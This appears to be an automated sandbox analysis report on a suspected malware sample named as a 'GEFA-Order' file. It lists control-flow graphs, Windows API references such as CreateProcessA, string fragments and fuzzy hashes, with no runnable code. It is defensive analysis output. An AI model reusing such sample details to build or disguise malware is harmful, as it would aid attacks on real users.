                                          • Instruction ID: 8c85ebcc76e937e23368b95311bbdcc2ecd2f0e64371fdbdefb9ba729cbc05fa
                                          • Opcode Fuzzy Hash: c5dffaf94a283575ea5e9b7ec279dbae6d3d6437f71f7af162eeb4b9b8639950
                                          • Instruction Fuzzy Hash: A95186B09013498FDB18DFAAD848B9EFFF1EF89315F248459E009A72A0D7749984CF65

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1244 192ca40-192cacf GetCurrentProcess 1248 192cad1-192cad7 1244->1248 1249 192cad8-192cb0c GetCurrentThread 1244->1249 1248->1249 1250 192cb15-192cb49 GetCurrentProcess 1249->1250 1251 192cb0e-192cb14 1249->1251 1253 192cb52-192cb6d call 192d01a 1250->1253 1254 192cb4b-192cb51 1250->1254 1251->1250 1256 192cb73-192cba2 GetCurrentThreadId 1253->1256 1254->1253 1258 192cba4-192cbaa 1256->1258 1259 192cbab-192cc0d 1256->1259 1258->1259
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 0192CABE
                                          • GetCurrentThread.KERNEL32 ref: 0192CAFB
                                          • GetCurrentProcess.KERNEL32 ref: 0192CB38
                                          • GetCurrentThreadId.KERNEL32 ref: 0192CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: ab5c3b9ed89ddaa143d75f5a938745be2080cf2095bcf08bd729f434d685a969
                                          • Instruction ID: 0e726a5cd0d250496d4de66a1eb814ea9575c03ed756be8b7f3a820f21020804
                                          • Opcode Fuzzy Hash: ab5c3b9ed89ddaa143d75f5a938745be2080cf2095bcf08bd729f434d685a969
                                          • Instruction Fuzzy Hash: 6B5174B09013098FDB18DFAAD448B9EBBF1EF89315F208419E019A7290DB745984CF65

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1396 6d9e1f8-6d9e235 1398 6d9e257-6d9e26d call 6d9e000 1396->1398 1399 6d9e237-6d9e23c call 6d9ebb1 1396->1399 1405 6d9e5e3-6d9e5f7 1398->1405 1406 6d9e273-6d9e27f 1398->1406 1401 6d9e242-6d9e244 1399->1401 1401->1398 1403 6d9e246-6d9e24e 1401->1403 1403->1398 1414 6d9e637-6d9e640 1405->1414 1407 6d9e3b0-6d9e3b7 1406->1407 1408 6d9e285-6d9e288 1406->1408 1409 6d9e3bd-6d9e3c6 1407->1409 1410 6d9e4e6-6d9e523 call 6d9da08 call 71ef2b0 1407->1410 1412 6d9e28b-6d9e294 1408->1412 1409->1410 1413 6d9e3cc-6d9e4d8 call 6d9da08 call 6d9df98 call 6d9da08 1409->1413 1454 6d9e529-6d9e5da call 6d9da08 1410->1454 1416 6d9e6d8 1412->1416 1417 6d9e29a-6d9e2ae 1412->1417 1507 6d9e4da 1413->1507 1508 6d9e4e3 1413->1508 1418 6d9e642-6d9e649 1414->1418 1419 6d9e605-6d9e60e 1414->1419 1421 6d9e6dd-6d9e6e1 1416->1421 1430 6d9e3a0-6d9e3aa 1417->1430 1431 6d9e2b4-6d9e349 call 6d9e000 * 2 call 6d9da08 call 6d9df98 call 6d9e040 call 6d9e0e8 call 6d9e150 1417->1431 1427 6d9e64b-6d9e68e call 6d9da08 1418->1427 1428 6d9e697-6d9e69e 1418->1428 1419->1416 1425 6d9e614-6d9e626 1419->1425 1423 6d9e6ec 1421->1423 1424 6d9e6e3 1421->1424 1437 6d9e6ed 1423->1437 1424->1423 1442 6d9e628-6d9e630 call 71efa50 1425->1442 1443 6d9e636 1425->1443 1427->1428 1432 6d9e6a0-6d9e6b0 1428->1432 1433 6d9e6c3-6d9e6d6 1428->1433 1430->1407 1430->1412 1486 6d9e368-6d9e39b call 6d9e150 1431->1486 1487 6d9e34b-6d9e363 call 6d9e0e8 call 6d9da08 call 6d9dcb8 1431->1487 1432->1433 1448 6d9e6b2-6d9e6ba 1432->1448 1433->1421 1437->1437 1442->1443 1443->1414 1448->1433 1454->1405 1486->1430 1487->1486 1507->1508 1508->1410
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q$4'^q
                                          • API String ID: 0-1196845430
                                          • Opcode ID: a135adc93e45800ae19093695ce4e4867ddcdae5127abdc3a01b8b0cf6007235
                                          • Instruction ID: a4776f3cca85e053d2d72b78c73dc37f1a031c534cb5bf2e2fb095b1eb4c9ee3
                                          • Opcode Fuzzy Hash: a135adc93e45800ae19093695ce4e4867ddcdae5127abdc3a01b8b0cf6007235
                                          • Instruction Fuzzy Hash: D6F1FD34A00218DFCB54DFA4D998A9DBBB2FF89301F158558E906AB365DB70EC42CF90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1593 6d96424-6d966be 1595 6d97b0c-6d97b13 1593->1595 1596 6d966c4-6d966cc 1593->1596 1598 6d97b19-6d97b21 1595->1598 1599 6d961c1-6d961d0 1595->1599 1597 6d9610f-6d96117 1596->1597 1600 6d96119-6d9668e call 6d941c8 1597->1600 1601 6d96120-6d9710b call 6d95360 1597->1601 1598->1597 1603 6d961d7-6d9620e call 6d95360 1599->1603 1600->1597 1613 6d96694-6d9669a 1600->1613 1601->1597 1614 6d97111-6d97119 1601->1614 1603->1597 1611 6d96214-6d9621c 1603->1611 1611->1597 1613->1597 1614->1597
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$C$q
                                          • API String ID: 0-2527442695
                                          • Opcode ID: 04930699e22cd9b0cf402d49ee1ddad57bd59f226e5c132827e19461d9b70b3a
                                          • Instruction ID: fdc485a6b50e2fac33b9f3e96cba6a07705f40d969fb399c32ccdb4d1c6906f2
                                          • Opcode Fuzzy Hash: 04930699e22cd9b0cf402d49ee1ddad57bd59f226e5c132827e19461d9b70b3a
                                          • Instruction Fuzzy Hash: 05010470C06218CFEFA0CF64C849BDDBBB0EB0A314F245199C40972290CB748AC4CF65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1734499959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: 5b8d687567f4c005be25895a1666c3bf18e3d3e5a452f7e78972a7c21c63560d
                                          • Instruction ID: fd0123687a6dc563f9e2e0e35a805672b8de9c0977cb0c79e21e362633631bd5
                                          • Opcode Fuzzy Hash: 5b8d687567f4c005be25895a1666c3bf18e3d3e5a452f7e78972a7c21c63560d
                                          • Instruction Fuzzy Hash: 77420974E04219DFDF94DF99E8486ADBBB2FF88301F108015DA16AB754CB749982CF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1936 6f1e7b9-6f1e7f4 1938 6f1e7f6 1936->1938 1939 6f1e7fd-6f1e810 call 6f1e448 1936->1939 1938->1939 1942 6f1e954-6f1e95b 1939->1942 1943 6f1e816-6f1e829 1939->1943 1944 6f1e961-6f1e976 1942->1944 1945 6f1ebf5-6f1ebfc 1942->1945 1953 6f1e837-6f1e851 1943->1953 1954 6f1e82b-6f1e832 1943->1954 1955 6f1e996-6f1e99c 1944->1955 1956 6f1e978-6f1e97a 1944->1956 1946 6f1ec6b-6f1ec72 1945->1946 1947 6f1ebfe-6f1ec07 1945->1947 1950 6f1ec78-6f1ec81 1946->1950 1951 6f1ed0e-6f1ed15 1946->1951 1947->1946 1952 6f1ec09-6f1ec1c 1947->1952 1950->1951 1957 6f1ec87-6f1ec9a 1950->1957 1958 6f1ed31-6f1ed37 1951->1958 1959 6f1ed17-6f1ed28 1951->1959 1952->1946 1974 6f1ec1e-6f1ec63 call 6f1b8c0 1952->1974 1970 6f1e853-6f1e856 1953->1970 1971 6f1e858-6f1e865 1953->1971 1960 6f1e94d 1954->1960 1963 6f1e9a2-6f1e9a4 1955->1963 1964 6f1ea64-6f1ea68 1955->1964 1956->1955 1961 6f1e97c-6f1e993 1956->1961 1979 6f1ecad-6f1ecb1 1957->1979 1980 6f1ec9c-6f1ecab 1957->1980 1966 6f1ed49-6f1ed52 1958->1966 1967 6f1ed39-6f1ed3f 1958->1967 1959->1958 1982 6f1ed2a 1959->1982 1960->1942 1961->1955 1963->1964 1973 6f1e9aa-6f1e9c4 1963->1973 1964->1945 1968 6f1ea6e-6f1ea70 1964->1968 1975 6f1ed41-6f1ed47 1967->1975 1976 6f1ed55-6f1edca 1967->1976 1968->1945 1977 6f1ea76-6f1ea7f 1968->1977 1981 6f1e867-6f1e87b 1970->1981 1971->1981 1999 6f1e9cc-6f1ea2b call 6f1b8c0 * 4 1973->1999 1974->1946 2013 6f1ec65-6f1ec68 1974->2013 1975->1966 1975->1976 2050 6f1edd8 1976->2050 2051 6f1edcc-6f1edd6 1976->2051 1983 6f1ebd2-6f1ebd8 1977->1983 1986 6f1ecd1-6f1ecd3 1979->1986 1987 6f1ecb3-6f1ecb5 1979->1987 1980->1979 1981->1960 2006 6f1e881-6f1e8d5 1981->2006 1982->1958 1991 6f1ebeb 1983->1991 1992 6f1ebda-6f1ebe9 1983->1992 1986->1951 1990 6f1ecd5-6f1ecdb 1986->1990 1987->1986 1994 6f1ecb7-6f1ecce 1987->1994 1990->1951 1996 6f1ecdd-6f1ed0b 1990->1996 1997 6f1ebed-6f1ebef 1991->1997 1992->1997 1994->1986 1996->1951 1997->1945 2001 6f1ea84-6f1ea92 call 6f1d090 1997->2001 2042 6f1ea42-6f1ea61 call 6f1b8c0 1999->2042 2043 6f1ea2d-6f1ea3f call 6f1b8c0 1999->2043 2019 6f1ea94-6f1ea9a 2001->2019 2020 6f1eaaa-6f1eac4 2001->2020 2052 6f1e8e3-6f1e8e7 2006->2052 2053 6f1e8d7-6f1e8d9 2006->2053 2013->1946 2022 6f1ea9c 2019->2022 2023 6f1ea9e-6f1eaa0 2019->2023 2020->1983 2028 6f1eaca-6f1eace 2020->2028 2022->2020 2023->2020 2031 6f1ead0-6f1ead9 2028->2031 2032 6f1eaef 2028->2032 2035 6f1eae0-6f1eae3 2031->2035 2036 6f1eadb-6f1eade 2031->2036 2037 6f1eaf2-6f1eb0c 2032->2037 2041 6f1eaed 2035->2041 2036->2041 2037->1983 2056 6f1eb12-6f1eb93 call 6f1b8c0 * 4 2037->2056 2041->2037 2042->1964 2043->2042 2057 6f1eddd-6f1eddf 2050->2057 2051->2057 2052->1960 2058 6f1e8e9-6f1e901 2052->2058 2053->2052 2084 6f1eb95-6f1eba7 call 6f1b8c0 2056->2084 2085 6f1ebaa-6f1ebd0 call 6f1b8c0 2056->2085 2059 6f1ede1-6f1ede4 2057->2059 2060 6f1ede6-6f1edeb 2057->2060 2058->1960 2064 6f1e903-6f1e90f 2058->2064 2063 6f1edf1-6f1ee1e 2059->2063 2060->2063 2065 6f1e911-6f1e914 2064->2065 2066 6f1e91e-6f1e924 2064->2066 2065->2066 2069 6f1e926-6f1e929 2066->2069 2070 6f1e92c-6f1e935 2066->2070 2069->2070 2072 6f1e944-6f1e94a 2070->2072 2073 6f1e937-6f1e93a 2070->2073 2072->1960 2073->2072 2084->2085 2085->1945 2085->1983
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $^q$$^q
                                          • API String ID: 0-355816377
                                          • Opcode ID: 580bf814fd41094e5092aab26714790f5e556ac8295efd71d1ec0697aca20239
                                          • Instruction ID: e805b75ce0558d723fb4ab7f4a6059d262b129cf9087a5a1d79ee7a133bb7a33
                                          • Opcode Fuzzy Hash: 580bf814fd41094e5092aab26714790f5e556ac8295efd71d1ec0697aca20239
                                          • Instruction Fuzzy Hash: 77123A31E00259CFDB55DFA4D894ABDBBB6FF48780F148019E812AB395DB389D46CB90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2090 6d118c0-6d118e8 2091 6d118ea 2090->2091 2092 6d118ef-6d11918 2090->2092 2091->2092 2093 6d11939 2092->2093 2094 6d1191a-6d11923 2092->2094 2095 6d1193c-6d11940 2093->2095 2096 6d11925-6d11928 2094->2096 2097 6d1192a-6d1192d 2094->2097 2098 6d11cf7-6d11d0e 2095->2098 2099 6d11937 2096->2099 2097->2099 2101 6d11945-6d11949 2098->2101 2102 6d11d14-6d11d18 2098->2102 2099->2095 2103 6d1194b-6d119a8 2101->2103 2104 6d1194e-6d11952 2101->2104 2105 6d11d1a-6d11d4a 2102->2105 2106 6d11d4d-6d11d51 2102->2106 2112 6d119aa-6d11a1b 2103->2112 2113 6d119ad-6d119b1 2103->2113 2108 6d11954-6d11978 2104->2108 2109 6d1197b-6d11996 2104->2109 2105->2106 2110 6d11d53-6d11d5c 2106->2110 2111 6d11d72 2106->2111 2108->2109 2133 6d1199e-6d1199f 2109->2133 2114 6d11d63-6d11d66 2110->2114 2115 6d11d5e-6d11d61 2110->2115 2116 6d11d75-6d11d7b 2111->2116 2125 6d11a20-6d11a24 2112->2125 2126 6d11a1d-6d11a7a 2112->2126 2119 6d119b3-6d119d7 2113->2119 2120 6d119da-6d11a01 2113->2120 2122 6d11d70 2114->2122 2115->2122 2119->2120 2147 6d11a11-6d11a12 2120->2147 2148 6d11a03-6d11a09 2120->2148 2122->2116 2128 6d11a26-6d11a4a 2125->2128 2129 6d11a4d-6d11a71 2125->2129 2134 6d11a7c-6d11ad8 2126->2134 2135 6d11a7f-6d11a83 2126->2135 2128->2129 2129->2098 2133->2098 2145 6d11ada-6d11b3c 2134->2145 2146 6d11add-6d11ae1 2134->2146 2138 6d11a85-6d11aa9 2135->2138 2139 6d11aac-6d11acf 2135->2139 2138->2139 2139->2098 2157 6d11b41-6d11b45 2145->2157 2158 6d11b3e-6d11ba0 2145->2158 2151 6d11ae3-6d11b07 2146->2151 2152 6d11b0a-6d11b22 2146->2152 2147->2098 2148->2147 2151->2152 2169 6d11b32-6d11b33 2152->2169 2170 6d11b24-6d11b2a 2152->2170 2160 6d11b47-6d11b6b 2157->2160 2161 6d11b6e-6d11b86 2157->2161 2167 6d11ba2-6d11c04 2158->2167 2168 6d11ba5-6d11ba9 2158->2168 2160->2161 2180 6d11b96-6d11b97 2161->2180 2181 6d11b88-6d11b8e 2161->2181 2178 6d11c06-6d11c68 2167->2178 2179 6d11c09-6d11c0d 2167->2179 2172 6d11bd2-6d11bea 2168->2172 2173 6d11bab-6d11bcf 2168->2173 2169->2098 2170->2169 2191 6d11bfa-6d11bfb 2172->2191 2192 6d11bec-6d11bf2 2172->2192 2173->2172 2189 6d11c6a-6d11cc3 2178->2189 2190 6d11c6d-6d11c71 2178->2190 2183 6d11c36-6d11c4e 2179->2183 2184 6d11c0f-6d11c33 2179->2184 2180->2098 2181->2180 2202 6d11c50-6d11c56 2183->2202 2203 6d11c5e-6d11c5f 2183->2203 2184->2183 2200 6d11cc5-6d11ce9 2189->2200 2201 6d11cec-6d11cef 2189->2201 2194 6d11c73-6d11c97 2190->2194 2195 6d11c9a-6d11cbd 2190->2195 2191->2098 2192->2191 2194->2195 2195->2098 2200->2201 2201->2098 2202->2203 2203->2098
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1734499959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: e813dace590621d4e8b5e906b1471c3d2e9657b967288effeebca1cf96cdb304
                                          • Instruction ID: 8c65877e88d7d5eb69416399c8133062620bd14edfb744af586865ee50f1d017
                                          • Opcode Fuzzy Hash: e813dace590621d4e8b5e906b1471c3d2e9657b967288effeebca1cf96cdb304
                                          • Instruction Fuzzy Hash: 9EF1E534D01308EFDB94DFA9E8946ACBBB2FF49315F204129EA16AB350DB706985CF41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2215 6d11598-6d115bd 2217 6d115c4-6d115e1 2215->2217 2218 6d115bf 2215->2218 2219 6d115e3-6d115ec 2217->2219 2220 6d11602 2217->2220 2218->2217 2221 6d115f3-6d115f6 2219->2221 2222 6d115ee-6d115f1 2219->2222 2223 6d11605-6d11609 2220->2223 2224 6d11600 2221->2224 2222->2224 2225 6d11824-6d1183b 2223->2225 2224->2223 2227 6d11841-6d11845 2225->2227 2228 6d1160e-6d11612 2225->2228 2229 6d11847-6d1186c 2227->2229 2230 6d1186f-6d11873 2227->2230 2231 6d11614-6d116b2 2228->2231 2232 6d1161a-6d1161e 2228->2232 2229->2230 2233 6d11875-6d1187e 2230->2233 2234 6d11894 2230->2234 2239 6d116b4-6d11752 2231->2239 2240 6d116ba-6d116be 2231->2240 2236 6d11620-6d1162d 2232->2236 2237 6d11648-6d1166d 2232->2237 2242 6d11880-6d11883 2233->2242 2243 6d11885-6d11888 2233->2243 2238 6d11897-6d1189d 2234->2238 2299 6d11630 call 6d75998 2236->2299 2300 6d11630 call 6d75988 2236->2300 2263 6d1166f-6d11678 2237->2263 2264 6d1168e 2237->2264 2251 6d11754-6d117ef 2239->2251 2252 6d1175a-6d1175e 2239->2252 2245 6d116c0-6d116e5 2240->2245 2246 6d116e8-6d1170d 2240->2246 2248 6d11892 2242->2248 2243->2248 2245->2246 2275 6d1170f-6d11718 2246->2275 2276 6d1172e 2246->2276 2248->2238 2260 6d117f1-6d11816 2251->2260 2261 6d11819-6d1181c 2251->2261 2257 6d11760-6d11785 2252->2257 2258 6d11788-6d117ad 2252->2258 2253 6d11636-6d11645 2253->2237 2257->2258 2289 6d117af-6d117b8 2258->2289 2290 6d117ce 2258->2290 2260->2261 2261->2225 2270 6d1167a-6d1167d 2263->2270 2271 6d1167f-6d11682 2263->2271 2272 6d11691-6d11698 2264->2272 2278 6d1168c 2270->2278 2271->2278 2273 6d116a8-6d116a9 2272->2273 2274 6d1169a-6d116a0 2272->2274 2273->2225 2274->2273 2280 6d1171a-6d1171d 2275->2280 2281 6d1171f-6d11722 2275->2281 2282 6d11731-6d11738 2276->2282 2278->2272 2285 6d1172c 2280->2285 2281->2285 2286 6d11748-6d11749 2282->2286 2287 6d1173a-6d11740 2282->2287 2285->2282 2286->2225 2287->2286 2293 6d117ba-6d117bd 2289->2293 2294 6d117bf-6d117c2 2289->2294 2291 6d117d1-6d117d8 2290->2291 2295 6d117e8-6d117e9 2291->2295 2296 6d117da-6d117e0 2291->2296 2298 6d117cc 2293->2298 2294->2298 2295->2225 2296->2295 2298->2291 2299->2253 2300->2253
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1734499959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: 298e2037683862e1d3235cf26ca745ac42adb4d12625f407416f77ba171ebe44
                                          • Instruction ID: 1f1d42f4dff2163d8968daaeb76b5e824ade2d80e814f73fa6cec0e8bb1180be
                                          • Opcode Fuzzy Hash: 298e2037683862e1d3235cf26ca745ac42adb4d12625f407416f77ba171ebe44
                                          • Instruction Fuzzy Hash: 7BA1E574E0021DEFDB44DFA5E8586ADBBB2FF88302F14842ADA12AB350CB755941CF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2301 6f1dd90-6f1dda2 2302 6f1de96-6f1debb 2301->2302 2303 6f1dda8-6f1ddaa 2301->2303 2305 6f1dec2-6f1dee6 2302->2305 2304 6f1ddb0-6f1ddbc 2303->2304 2303->2305 2309 6f1ddd0-6f1dde0 2304->2309 2310 6f1ddbe-6f1ddca 2304->2310 2317 6f1deed-6f1df11 2305->2317 2309->2317 2318 6f1dde6-6f1ddf4 2309->2318 2310->2309 2310->2317 2321 6f1df18-6f1df9b 2317->2321 2318->2321 2322 6f1ddfa-6f1ddff 2318->2322 2345 6f1dfa2-6f1dfb0 call 6f1d090 2321->2345 2346 6f1df9d call 6f1ade8 2321->2346 2356 6f1de01 call 6f1df90 2322->2356 2357 6f1de01 call 6f1df80 2322->2357 2358 6f1de01 call 6f1dd90 2322->2358 2359 6f1de01 call 6f1dd83 2322->2359 2360 6f1de01 call 6f1dd38 2322->2360 2324 6f1de07-6f1de31 2333 6f1de39-6f1de50 2324->2333 2339 6f1de73-6f1de93 call 6f1be90 2333->2339 2340 6f1de52-6f1de6b 2333->2340 2340->2339 2352 6f1dfb1-6f1dfb8 2345->2352 2353 6f1dfc8-6f1dfca 2345->2353 2346->2345 2354 6f1dfba 2352->2354 2355 6f1dfbc-6f1dfbe 2352->2355 2354->2353 2355->2353 2356->2324 2357->2324 2358->2324 2359->2324 2360->2324
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq$Hbq
                                          • API String ID: 0-4081012451
                                          • Opcode ID: 0a612940b2c57b20122f096ff6462f2021b37a5358209d5b88c9294fd29828bb
                                          • Instruction ID: 6f46d2f25c4381496e43923f642a10086aa6a3d7e512c68a5b063d340ba78de0
                                          • Opcode Fuzzy Hash: 0a612940b2c57b20122f096ff6462f2021b37a5358209d5b88c9294fd29828bb
                                          • Instruction Fuzzy Hash: D3518C34B002158FCB99AB38C86462EBBB3AFD9346B54446CD9069B7A0DF35DD02CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$<
                                          • API String ID: 0-103380429
                                          • Opcode ID: 3553670792c55683db76449cea653d5ef990bef742642034efa4094c3736e0b0
                                          • Instruction ID: 09fe0bb84707f039071b9ddd39315e62c55d419cba17f77bba10230a174d950a
                                          • Opcode Fuzzy Hash: 3553670792c55683db76449cea653d5ef990bef742642034efa4094c3736e0b0
                                          • Instruction Fuzzy Hash: 5051E274D01258CFEBA0DF58D888BD9BBB1AB45305F0094EAC10EBB650CB745AC9CF25
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5$h
                                          • API String ID: 0-1868625573
                                          • Opcode ID: 246934c35599c349d2769eeaee0fd687ebef6a6bbf7e65a290b9851b2d7547f2
                                          • Instruction ID: c8ece18f6e7c2b48a148adefd3656af9295ad4f53df0731ffddf3d4bc584f8d7
                                          • Opcode Fuzzy Hash: 246934c35599c349d2769eeaee0fd687ebef6a6bbf7e65a290b9851b2d7547f2
                                          • Instruction Fuzzy Hash: CB21E9B4A44618CFCBA4DF28D8987A9BBB1BB48341F5041E9D64EE7390DB305E84CF45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$C
                                          • API String ID: 0-3331529056
                                          • Opcode ID: aa0cbc533168d0c0b35dfa819b0bfd52325bc85be36eeead6c80c741c954d472
                                          • Instruction ID: 7571f9cb6070c87f7b49223561e2a573219ba33d60790939ebb853c4dd091967
                                          • Opcode Fuzzy Hash: aa0cbc533168d0c0b35dfa819b0bfd52325bc85be36eeead6c80c741c954d472
                                          • Instruction Fuzzy Hash: 82F0AF70902229CFEFA0CF64C888B8DBBB1FB09315F2485E9C409B2250C7749AC1CF65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq
                                          • API String ID: 0-2474004448
                                          • Opcode ID: edb81795a80583db3deefa6c82c2fcaa693ca2a274d3b25b6f33e85271c2de76
                                          • Instruction ID: f64428c993514122cb3b401843fc14de0a06a43d4fb1bbf16b25ad699ab88a22
                                          • Opcode Fuzzy Hash: edb81795a80583db3deefa6c82c2fcaa693ca2a274d3b25b6f33e85271c2de76
                                          • Instruction Fuzzy Hash: CC52F875A002289FDB64DF69C990BADBBF2BB88301F1541D9E509EB351DA309E81CF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (_^q
                                          • API String ID: 0-538443824
                                          • Opcode ID: 68c0c8bc6b30b113743f347a6d4301fa48f5cd45f6256e87a1a32ab7a2edfc5b
                                          • Instruction ID: 8fbe97eaf546ad330b524b378047fd3a7b3373aa23d73260279b316e456f2c22
                                          • Opcode Fuzzy Hash: 68c0c8bc6b30b113743f347a6d4301fa48f5cd45f6256e87a1a32ab7a2edfc5b
                                          • Instruction Fuzzy Hash: AB226935A002089FDB44DFA8D894A6DB7F2BF88340F558469E905EF3A5CB71ED41CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Pl^q
                                          • API String ID: 0-2831078282
                                          • Opcode ID: 13732b9e2af2b93709a3bd820cdc3b4f81123a8d330d1e395e8f1a3946ac5112
                                          • Instruction ID: 9f37b7c8f77bae5d457832cffda3ad25aaa8de28dfb79a97e75bab5977900458
                                          • Opcode Fuzzy Hash: 13732b9e2af2b93709a3bd820cdc3b4f81123a8d330d1e395e8f1a3946ac5112
                                          • Instruction Fuzzy Hash: 5D51F274B002098FDB44DF28C894A6A7BE6BF89740F1540A5E905DF3B5DB70ED41CB91
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06EE2D2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6023d2b917dfa75c710875ed600ae1456a503172bcae908014917a7f639d05c5
                                          • Instruction ID: 50ad430690c9864e44dc9b3a389a013dcc6c567ff5f5078b688cc744d0bf209d
                                          • Opcode Fuzzy Hash: 6023d2b917dfa75c710875ed600ae1456a503172bcae908014917a7f639d05c5
                                          • Instruction Fuzzy Hash: 86814571E007198FDB50CFA9C8817AEBBF6BF48314F148529E959EB284DB749981CF81
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06EE2D2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 3121fa1cadbe03fcd1bac14393323c5abd86b16d55f2f0ae9afd59c26c957ea2
